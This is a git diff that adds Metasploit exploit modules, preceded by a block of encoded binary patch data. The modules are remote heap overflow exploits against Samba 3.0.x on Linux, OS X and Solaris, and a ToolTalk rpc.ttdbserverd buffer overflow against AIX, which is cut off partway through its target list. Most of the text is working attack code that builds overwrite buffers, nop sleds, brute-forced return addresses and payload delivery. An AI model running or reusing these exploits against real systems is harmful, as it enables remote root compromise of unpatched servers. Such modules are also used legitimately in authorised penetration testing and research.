zcmV+)58&`0iwFP*zNtz81MM4YciKiaU*T8W5+?x{jKs@HU1ygPoNz)g1>88B=5S;& zfR2Sk_3)#O_qXr8qt{3Xu$wfeyUUz7NO$i0&fIxuM%N7Yrerf?vQ%cQT7L8w6bZ{= zy-vUKVOjX(vS`tk0iM&OO;1Z|0|S97T0zZ3*eEZEKFkq-nRPx(xNBg zZ!?=ImO3vj7Rqw`JG0C$mq7t;)N1SEFCQLOc>HClUTw%S#=n8>;1Nh)E_!?UKac<8 z@5-)il`k}-%#16zQ0#d&J8Tcz%|YwUaab2Li){1#+X$*$UuMsGou4C!YiPe^v)U9s zLg@zf0!HxZ2%I@HvY7}}T0+>ypj1+H-MofhvzbihGwh)lc=iV@EzNMIkb7ePYUGNr zSAn}{@EK+nTf(!kL(jHpIry_jdU)h7BfbaDjgyTDwZS!1)0k=on~WVOsVKu#nQfCk zj-?p3=4hsIUxljoQ%ICK=2Fr$(+thA)NiL%ATOqo7rSYS%Hx<@qmX8-#eE2}nW={S z9n)3k+mR95v|#k1-$pfIFRv<2JgkKyn3yP>8@b03)4dEY)BK;*ZDJZsus-gZEtYRW zj#<4C@y}Si8bPvlvp(EXRLblB$^37*Uq8uh8UHJC?a&|ptBrcSLgRm!#YIk3&O)L7?Jy=%7Kbb9UMy}WBE3kIb{A>ftU^DA?3 z47r=-IQPRnOv&lQVJ zL}ug(Q82@ZCg|^@;+JZ-U9r?Sik=PH4L)%HV)f zAC3~y#P>l>&%x(%U(a#H!DWdgi(2~S@_dBU#BhO6tV^(A%A)C3a8 zTI-Wc=2D|TyuhJnsZGo&MEVstg6FQt#jz0g-@htHeU>A8|KVRa*zC&Rt|Z6*)tr8y zeyNNt>p!VpYXs~6!%B_T|A+E!{r7FkW6e-?cf#OD+o533UuI(pjb1t2r6cG*x$#Ot3vh}u$13yBAQVgZ#eES?T z%Sp4-JsY$OM_&HT3j*`~_Fz2xWl$@?@iCO-0wAXhB3P!C&k2Y*q)z9VxkI+>hN*f! zmy(Tf1(g%uD4pd>CEc8rbaut`V~H?IUHqR+`6z!XLhr2G<=RH_hG(r-dpJbs-QPI< zt?BMpgFuKmMy7()_=6Sgr2*|FTT7eG9jHjs3mA}p5D8j}b*1QY6Mn&o9p(h?xPMw2Z6T?y zMLEN?W-pNkXET~>HtlxI5D)NiYB7e2Or2|-3Le3&>4K^lfYU-uEtYoSIt(<-D8{6W z%jJbR(WbYY5dvKUm82OBpu!6qa1ui=uX|_knib3d$ykJ;!P1 zg~y0UPDqQPuLYc#$XTHsm?K~s)?09eiH3G$DuEE6V-ZY?bIIfK9hJAhToPdcHNFL1 zaU$A-buNf3ozPYQai5z@G-{4K(adX_s9i8{Z8mlFBIkkF@V+y8b9y#{X72;MZw>~{ z-sr;-VmosaYcX|sytKtq*N`=uW+{eqixzMe@7jab8>DIe)aiCcAJ7mu>5O`q!{Fp} z08QvO2cu5wtlJzw|7_4d9kveuhKv;Rn#2Z2PkFG=mlNhFnr?^2f4~6SsGvT9xpKuY z&??ieP(1}yY+>7D$hj!GY0S8(h#h(J2ypZ;Os5Ff*zizMb2Yl0K8kP=I)-{sgu0Aq zigAev5{3>EAd?eqiULk_)3l24lW9AI{;mmtNlcbXa#fN6&W26TwsJQ6@X-|mZ_HLl zTwIhG4;Y83lKSyf)7ff`bGu}A3IXj;$Qz?PY;a4=m=mmcdDJ67rZYv%j5YI%>x5shRJ1rpLUw zG_RSpR9C$3!@sSoEqEdo(bw`eYrH{jggt+B+5#Mg_+~n$2}Pw%c9e3ZDLgYwaF|gQ zO1y*_41E@xVRL8L>8;8E@7WJB(J|F+1_~&fEUiSA3KTJuW1PfDe&a6WC^pU|9LrUm zwMIuM>wD77{vj_FVog?{i<>U;3%gg4fkw^Y+wtJ6*X#6NgOvR%ttnz#vY0YKo>P+) z6kg#N(wlw(p2ENLHR(kIN+5?zpZ$DX%zi;+_VO5{8`WP&drKif50tf$oMdFMb7V3> z_Yi%A{e!xMY3R4u6Kq?%z_^gtywO|@londPej~L}Sl`l67k^x@95mpPSq9UwlUo|Ii{4~Vka3MOJ{-4cmk}pZ zREzzCbMhw|0X@a$AnWNKcj>0^J(pipwuNuA#c2j78&I1&^hd z>?zv~`Ed@O$X!FHng0aWTP``n0Mc_zS$({~iTTZeM^one`U#yYby4M&EYF>pY!-5W z9P`nBK0y|zD?ycS=wZ1pK_wu#KslG*^PTq%LqIH*c#T&PV)9o3>-+Ehafb{H)uu+B z^oSgDNDTd>^oi`pW(-fCLIjotaKbSkE9oTF4J0*QH%pS#1#pt2kxp_LfP;v|O-Y!L zUDZ6HaduVFgo4>sy%PFRqKF5T$0|hPkqSd~|0t~nXiaQZ!?GqKtHD?kht&|Idp~k~ z+~<+I^z&YlYnr>CPg_qT(>EZQ-``S!bw6cpzNY4xrdMoNkt$(jN9k! z)@S}iYZ&k8{h%{y(++ume9}2@zv7csdg~85zcfef&-C2vo%TMwJ3SjBL;P3Z-*q`j zv(s(AihtiF={c^`%6DPuX6hHtA^c1n3Dt`_w3O+LPlol%CbMh5g z_lfx{?6_sf>0V}k_AA==?8pbnKB!U)L6rbhC(!EJ>?z0M3F`Rgt7i8 z*jC%F+D1JpUqg?tzTXh+D$!n8qgJ}m9Ox5OzXk2?2{eD|_(V2LUBlZ(o-kXrw54NO z_5n0QIOh}9@!e*=Gr(YCx)(aTHmwOv6h{GXM073x3!iElj-nZS_luqiOAdeM@naX?=L{vZbr zl~3s|^{6~eHE;euGaVCrrF>O`&(`_aY{olbCAuTfDwwxWt`Fuco?KNo?SRb|p}}D= ze${DC$Gg1$OImL0*{&?#bEHWc-K-ENX?MaYxNwOa&gT9eN5)d_f5Z+!e+?O1&VN>< zdd)xoRcq9wL%RQ0t?cf9e3Np|`yYd|UhA|Mon7~uNjAFOv2qeWtno;NqvpeQx6?a2 zAGdoar-N4exNI}t3Q++Z?o}2Z-KX0a31soadO+`8l}ch3!UO)V+oMnv>2LG9Da=_B zN0(GW+;m9-LL|Vy3gW~0jStzs1tP-QTpmv2#G4?|^@G)$x7lFBJ$@-{+hw-ko>(Rm z_`c-$_r*#j5HCng} h%C79nuI$RL?8>g}%C79nuKbUb{{WW_S@8f+004^7sZ0O> literal 0 HcmV?d00001 diff --git a/lsa_transnames_heap_linux.rb b/lsa_transnames_heap_linux.rb new file mode 100644 index 0000000..2be82f8 --- /dev/null +++ b/lsa_transnames_heap_linux.rb @@ -0,0 +1,345 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB::Client + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Samba lsa_io_trans_names Heap Overflow', + 'Description' => %q{ + This module triggers a heap overflow in the LSA RPC service + of the Samba daemon. This module uses the TALLOC chunk overwrite + method (credit Ramon and Adriano), which only works with Samba + versions 3.0.21-3.0.24. Additionally, this module will not work + when the Samba "log level" parameter is higher than "2". + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + 'hdm' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2007-2446'], + ['OSVDB', '34699'], + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1024, # no limit really + }, + 'Platform' => 'linux', + 'DefaultOptions' => + { + 'PrependSetresuid' => true, + 'PrependSetreuid' => true, + 'PrependSetuid' => true, + }, + 'Targets' => + [ + ['Linux vsyscall', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xffffe410 }, + 'Stop' => { 'Ret' => 0xffffe413 }, + 'Step' => 1, + } + } + ], + + + ## + # 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF + # 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm + # b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon + # 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon + # 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon + # 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm + # 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew + # + ## + + ['Linux Heap Brute Force (Debian/Ubuntu)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x08352000 }, + 'Stop' => { 'Ret' => 0x0843d000 }, + 'Step' => 60*1024, + + } + } + ], + + ['Linux Heap Brute Force (Gentoo)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x80310000 }, + 'Stop' => { 'Ret' => 0x8042f000 }, + 'Step' => 60*1024, + + } + } + ], + + + + ['Linux Heap Brute Force (Mandriva)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x80380000 }, + 'Stop' => { 'Ret' => 0x8045b000 }, + 'Step' => 60*1024, + + } + } + ], + + ['Linux Heap Brute Force (RHEL/CentOS)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xb800f000 }, + 'Stop' => { 'Ret' => 0xb80c9000 }, + 'Step' => 60*1024, + + } + } + ], + + ['Linux Heap Brute Force (SUSE)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x80365000 }, + 'Stop' => { 'Ret' => 0x80424000 }, + 'Step' => 60*1024, + + } + } + ], + + ['Linux Heap Brute Force (Slackware)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x8033c000 }, + 'Stop' => { 'Ret' => 0x80412000 }, + 'Step' => 60*1024, + + } + } + ], + + ['Linux Heap Brute Force (OpenWRT MIPS)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_MIPSBE ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x55900000 }, + 'Stop' => { 'Ret' => 0x559c0000 }, + 'Step' => 60*1024, + } + } + ], + + ['DEBUG', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xAABBCCDD }, + 'Stop' => { 'Ret' => 0xAABBCCDD }, + 'Step' => 4, + } + } + ], + ], + 'DisclosureDate' => '2007-05-14', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), + ]) + + deregister_options('SMB::ProtocolVersion') + end + + def check + begin + connect(versions: [1]) + smb_login() + disconnect() + if (smb_peer_lm() =~ /Samba/i) + return CheckCode::Detected + else + return CheckCode::Safe + end + rescue ::Exception + return CheckCode::Safe + end + end + + def brute_exploit(target_addrs) + + if(not @nops) + if (target['Nops'] > 0) + print_status("Creating nop sled....") + @nops = make_nops(target['Nops']) + else + @nops = '' + end + + # @nops = "\xcc" * (@nops.length) + end + + print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) + + nops = @nops + pipe = datastore['SMBPIPE'].downcase + + print_status("Connecting to the SMB service...") + connect(versions: [1]) + smb_login() + + if ! @checked_peerlm + if smb_peer_lm !~ /Samba 3\.0\.2[1234]/i + fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})") + end + end + + @checked_peerlm = true + + datastore['DCERPC::fake_bind_multi'] = false + + handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + jumper = "P" * 256 + jumper[24, 5] = "\xe9" + [-5229-11-5-(nops.length/2)].pack('V') + + num_entries = 256 + num_entries2 = 272 + + # first talloc_chunk + # 16 bits align + # 16 bits sid_name_use + # 16 bits uni_str_len + # 16 bits uni_max_len + # 32 bits buffer + # 32 bits domain_idx + buf = (('A' * 16) * num_entries) + + # padding + buf << 'A' * 8 + + # TALLOC_MAGIC + talloc_magic = "\x70\xec\x14\xe8" + + # second talloc_chunk header + buf << NDR.long(0) + NDR.long(0) # next, prev + buf << NDR.long(0) + NDR.long(0) # parent, child + buf << NDR.long(0) # refs + buf << [target_addrs['Ret']].pack('V') # destructor + buf << 'A' * 4 # name + buf << 'A' * 4 # size + buf << talloc_magic # flags + buf << jumper + + stub = lsa_open_policy(dcerpc) + + stub << NDR.long(0) # num_entries + stub << NDR.long(0) # ptr_sid_enum + stub << NDR.long(num_entries) # num_entries + stub << NDR.long(0x20004) # ptr_trans_names + stub << NDR.long(num_entries2) # num_entries2 + stub << buf + stub << nops + stub << payload.encoded + + print_status("Calling the vulnerable function...") + + begin + # LsarLookupSids + dcerpc.call(0x0f, stub) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError + print_status('Server did not respond, this is expected') + rescue Rex::Proto::DCERPC::Exceptions::Fault + print_error('Server is most likely patched...') + rescue => e + if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ + print_status('Server disconnected, this is expected') + else + print_error("Error: #{e.class}: #{e}") + end + end + + handler + disconnect + end + + def lsa_open_policy(dcerpc, server="\\") + stubdata = + # Server + NDR.uwstring(server) + + # Object Attributes + NDR.long(24) + # SIZE + NDR.long(0) + # LSPTR + NDR.long(0) + # NAME + NDR.long(0) + # ATTRS + NDR.long(0) + # SEC DES + # LSA QOS PTR + NDR.long(1) + # Referent + NDR.long(12) + # Length + NDR.long(2) + # Impersonation + NDR.long(1) + # Context Tracking + NDR.long(0) + # Effective Only + # Access Mask + NDR.long(0x02000000) + + res = dcerpc.call(6, stubdata) + + dcerpc.last_response.stub_data[0,20] + end +end diff --git a/lsa_transnames_heap_osx.rb b/lsa_transnames_heap_osx.rb new file mode 100644 index 0000000..c6f471f --- /dev/null +++ b/lsa_transnames_heap_osx.rb @@ -0,0 +1,336 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB::Client + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Samba lsa_io_trans_names Heap Overflow', + 'Description' => %q{ + This module triggers a heap overflow in the LSA RPC service + of the Samba daemon. This module uses the szone_free() to overwrite + the size() or free() pointer in initial_malloc_zones structure. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + 'hdm' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2007-2446'], + ['OSVDB', '34699'], + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1024, + }, + 'Platform' => 'osx', + 'DefaultOptions' => + { + 'PrependSetresuid' => true, + }, + 'Targets' => + [ + ['Mac OS X 10.4.x x86 Samba 3.0.10', + { + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 4 * 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x01818000 }, + 'Stop' => { 'Ret' => 0x01830000 }, + 'Step' => 3351, + }, + } + ], + ['Mac OS X 10.4.x PPC Samba 3.0.10', + { + 'Platform' => 'osx', + 'Arch' => [ ARCH_PPC ], + 'Nops' => 1600, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x01813000 }, + 'Stop' => { 'Ret' => 0x01830000 }, + 'Step' => 796, + } + } + ], + ['DEBUG', + { + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 4 * 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 0, + } + } + ], + ], + 'DisclosureDate' => '2007-05-14' + )) + + register_options( + [ + OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), + ]) + + end + + # Handle a strange byteswapping issue on PPC + def ppc_byteswap(addr) + data = [addr].pack('N') + (data[1,1] + data[0,1] + data[3,1] + data[2,1]).unpack('N')[0] + end + + def brute_exploit(target_addrs) + + if(not @nops) + if (target['Nops'] > 0) + print_status("Creating nop sled....") + @nops = make_nops(target['Nops']) + else + @nops = '' + end + end + + print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) + + pipe = datastore['SMBPIPE'].downcase + + print_status("Connecting to the SMB service...") + connect() + smb_login() + + datastore['DCERPC::fake_bind_multi'] = false + + handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + num_entries = 256 + num_entries2 = 257 + + # + # First talloc_chunk + # 16 bits align + # 16 bits sid_name_use + # 16 bits uni_str_len + # 16 bits uni_max_len + # 32 bits buffer + # 32 bits domain_idx + # + buf = (('A' * 16) * num_entries) + + # Padding + buf << 'A' * 4 + + # + # Use the szone_free() to overwrite the size() pointer in + # initial_malloc_zones structure. + # + size_pointer = 0x1800008 + + # Initial nops array + nops = '' + + # x86 + if (target.arch.include?(ARCH_X86)) + + # + # We don't use the size() pointer anymore because it + # results in a unexpected behavior when smbd process + # is started by launchd. + # + free_pointer = 0x1800018 + nop = "\x16" + + # + # First talloc_chunk + # 16 bits align + # 16 bits sid_name_use + # 16 bits uni_str_len + # 16 bits uni_max_len + # 32 bits buffer + # 32 bits domain_idx + # + + # First nop block + buf = ((nop * 16) * num_entries) + + # + # A nop block of 0x16 (pushl %ss) and the address of + # 0x1800014 results in a jns instruction which when + # executed will jump over the address written eight + # bytes past our target address by szone_free() (the + # sign flag is zero at the moment our target address is + # executed). + # + # 0x357b ^ ( 0x1800014 ^ 0x16161616 ) = 0x17962379 + # + # This is the output of the sequence of xor operations + # 0: 79 23 jns 0x25 + # 2: 96 xchgl %eax,%esi + # 3: 17 popl %ss + # 4: 16 pushl %ss + # 5: 16 pushl %ss + # 6: 16 pushl %ss + # 7: 16 pushl %ss + # 8: 14 00 adcb $0x0,%al + # a: 80 01 16 addb $0x16,(%ecx) + # + # This jump is needed because the ecx register does not + # point to a valid memory location in free() context + # (it is zero). + # + # The jump will hit our nop block which will be executed + # until it reaches the payload. + # + + # Padding nops + buf << nop * 2 + + # Jump over the pointers + buf << "\xeb\x08" + + # Pointers + buf << [target_addrs['Ret']].pack('V') + buf << [free_pointer - 4].pack('V') + + # + # We expect to hit this nop block or the one before + # the pointers. + # + buf << nop * (3852 - 8 - payload.encoded.length) + + # Payload + buf << payload.encoded + + # Padding nops + buf << nop * 1024 + + stub = lsa_open_policy(dcerpc) + + stub << NDR.long(0) # num_entries + stub << NDR.long(0) # ptr_sid_enum + stub << NDR.long(num_entries) # num_entries + stub << NDR.long(0x20004) # ptr_trans_names + stub << NDR.long(num_entries2) # num_entries2 + stub << buf + + # PPC + else + + # + # The first half of the nop sled is an XOR encoded branch + # instruction. The second half is a series of unencoded nop + # instructions. The result is: + # + # > This is the decoded branch instruction + # 0x181c380: bl 0x181c6a0 + # + # > The size pointer is written below this + # 0x181c384: .long 0x1800004 + # + # > Followed by the encoded branch sled + # 0x181c388: ba 0x180365c + # [ ... ] + # + # > The branch lands in the normal nop sled + # 0x181c6a0: andi. r17,r16,58162 + # [ ... ] + # + # > Finally we reach our payload :-) + # + + size_pointer = size_pointer - 4 + + sled = target['Nops'] + jump = [ 0x357b ^ ( size_pointer ^ (0x48000001 + sled / 2 )) ].pack('N') + nops = (jump * (sled / 8)) + @nops[0, sled / 8] + + addr_size = ppc_byteswap(size_pointer) + addr_ret = ppc_byteswap(target_addrs['Ret']) + + # This oddness is required for PPC + buf << [addr_size].pack('N') + buf << [addr_ret ].pack('N')[2,2] + buf << [addr_ret ].pack('N') + + # Padding + buf << "A" * (256 - 10) + + stub = lsa_open_policy(dcerpc) + + stub << NDR.long(0) # num_entries + stub << NDR.long(0) # ptr_sid_enum + stub << NDR.long(num_entries) # num_entries + stub << NDR.long(0x20004) # ptr_trans_names + stub << NDR.long(num_entries2) # num_entries2 + stub << buf + stub << nops + stub << payload.encoded + end + + print_status("Calling the vulnerable function...") + + begin + # LsarLookupSids + dcerpc.call(0x0f, stub) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError + print_status('Server did not respond, this is expected') + rescue Rex::Proto::DCERPC::Exceptions::Fault + print_error('Server is most likely patched...') + rescue => e + if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ + print_status('Server disconnected, this is expected') + else + print_error("Error: #{e.class}: #{e}") + end + end + + handler + disconnect + end + + def lsa_open_policy(dcerpc, server="\\") + + stubdata = + # Server + NDR.uwstring(server) + + # Object Attributes + NDR.long(24) + # SIZE + NDR.long(0) + # LSPTR + NDR.long(0) + # NAME + NDR.long(0) + # ATTRS + NDR.long(0) + # SEC DES + # LSA QOS PTR + NDR.long(1) + # Referent + NDR.long(12) + # Length + NDR.long(2) + # Impersonation + NDR.long(1) + # Context Tracking + NDR.long(0) + # Effective Only + # Access Mask + NDR.long(0x02000000) + + res = dcerpc.call(6, stubdata) + + dcerpc.last_response.stub_data[0,20] + end +end diff --git a/lsa_transnames_heap_solaris.rb b/lsa_transnames_heap_solaris.rb new file mode 100644 index 0000000..3e88d38 --- /dev/null +++ b/lsa_transnames_heap_solaris.rb @@ -0,0 +1,212 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB::Client + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Samba lsa_io_trans_names Heap Overflow', + 'Description' => %q{ + This module triggers a heap overflow in the LSA RPC service + of the Samba daemon. This module uses the TALLOC chunk overwrite + method (credit Ramon and Adriano), which only works with Samba + versions 3.0.21-3.0.24. Additionally, this module will not work + when the Samba "log level" parameter is higher than "2". + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + 'hdm' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2007-2446'], + ['OSVDB', '34699'], + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1024, + }, + 'Platform' => 'solaris', + 'Targets' => + [ + ['Solaris 8/9/10 x86 Samba 3.0.21-3.0.24', + { + 'Platform' => 'solaris', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64 * 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x082f2000 }, + 'Stop' => { 'Ret' => 0x084f2000 }, + 'Step' => 60 * 1024, + } + } + ], + ['Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24', + { + 'Platform' => 'solaris', + 'Arch' => [ ARCH_SPARC ], + 'Nops' => 64 * 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x00322000 }, + 'Stop' => { 'Ret' => 0x00722000 }, + 'Step' => 60 * 1024, + } + } + ], + ['DEBUG', + { + 'Platform' => 'solaris', + 'Arch' => [ ARCH_X86 ], + 'Nops' => 64 * 1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 60 * 1024, + } + } + ], + ], + 'DisclosureDate' => '2007-05-14', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), + ]) + + end + + # Need to perform target detection + def autofilter + false + end + + def brute_exploit(target_addrs) + + if(not @nops) + if (target['Nops'] > 0) + print_status("Creating nop sled....") + @nops = make_nops(target['Nops']) + else + @nops = '' + end + end + + print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) + + nops = @nops + pipe = datastore['SMBPIPE'].downcase + + print_status("Connecting to the SMB service...") + connect() + smb_login() + + datastore['DCERPC::fake_bind_multi'] = false + + handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + num_entries = 272 + num_entries2 = 288 + + # + # First talloc_chunk + # 16 bits align + # 16 bits sid_name_use + # 16 bits uni_str_len + # 16 bits uni_max_len + # 32 bits buffer + # 32 bits domain_idx + # + buf = (('A' * 16) * num_entries) + + # Padding + buf << 'A' * 8 + + # TALLOC_MAGIC + talloc_magic = "\x70\xec\x14\xe8" + + # Second talloc_chunk header + buf << 'A' * 8 # next, prev + buf << NDR.long(0) + NDR.long(0) # parent, child + buf << NDR.long(0) # refs + buf << [target_addrs['Ret']].pack('V') # destructor + buf << 'A' * 4 # name + buf << 'A' * 4 # size + buf << talloc_magic # flags + + stub = lsa_open_policy(dcerpc) + + stub << NDR.long(0) # num_entries + stub << NDR.long(0) # ptr_sid_enum + stub << NDR.long(num_entries) # num_entries + stub << NDR.long(0x20004) # ptr_trans_names + stub << NDR.long(num_entries2) # num_entries2 + stub << buf + stub << nops + stub << payload.encoded + + print_status("Calling the vulnerable function...") + + begin + # LsarLookupSids + dcerpc.call(0x0f, stub) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError + print_status('Server did not respond, this is expected') + rescue Rex::Proto::DCERPC::Exceptions::Fault + print_error('Server is most likely patched...') + rescue => e + if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ + print_status('Server disconnected, this is expected') + else + print_error("Error: #{e.class}: #{e}") + end + end + + handler + disconnect + end + + def lsa_open_policy(dcerpc, server="\\") + stubdata = + # Server + NDR.uwstring(server) + + # Object Attributes + NDR.long(24) + # SIZE + NDR.long(0) + # LSPTR + NDR.long(0) + # NAME + NDR.long(0) + # ATTRS + NDR.long(0) + # SEC DES + # LSA QOS PTR + NDR.long(1) + # Referent + NDR.long(12) + # Length + NDR.long(2) + # Impersonation + NDR.long(1) + # Context Tracking + NDR.long(0) + # Effective Only + # Access Mask + NDR.long(0x02000000) + + res = dcerpc.call(6, stubdata) + + dcerpc.last_response.stub_data[0,20] + end + + +end diff --git a/rpc_ttdbserverd_realpath.rb b/rpc_ttdbserverd_realpath.rb new file mode 100644 index 0000000..de9b868 --- /dev/null +++ b/rpc_ttdbserverd_realpath.rb @@ -0,0 +1,278 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::SunRPC + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in _tt_internal_realpath + function of the ToolTalk database server (rpc.ttdbserverd). + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Platform' => [ 'aix' ], + 'References' => + [ + [ 'CVE', '2009-2727'], + [ 'OSVDB', '55151' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ + 'IBM AIX Version 6.1.4', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099430+4096, + 'Addr1' => 0x2ff1ff50-8192, + 'AIX' => '6.1.4', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099430-8192 }, + 'Stop' => { 'Ret' => 0x20099430+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.3', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.3', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.2', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.2', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.1', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.1', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.0', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.0', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.10 